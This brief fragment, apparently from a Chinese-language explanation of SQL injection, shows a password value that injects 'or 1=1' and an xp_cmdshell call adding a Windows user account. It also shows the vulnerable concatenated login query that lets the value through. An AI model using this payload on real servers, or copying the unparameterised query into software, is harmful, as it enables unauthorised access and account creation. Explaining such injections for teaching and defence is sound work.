例如设置password = "' or 1=1;exec xp_cmdshell net user ad 111/add;--"
select user from test where user='"+user+"' and password = '"+password+"'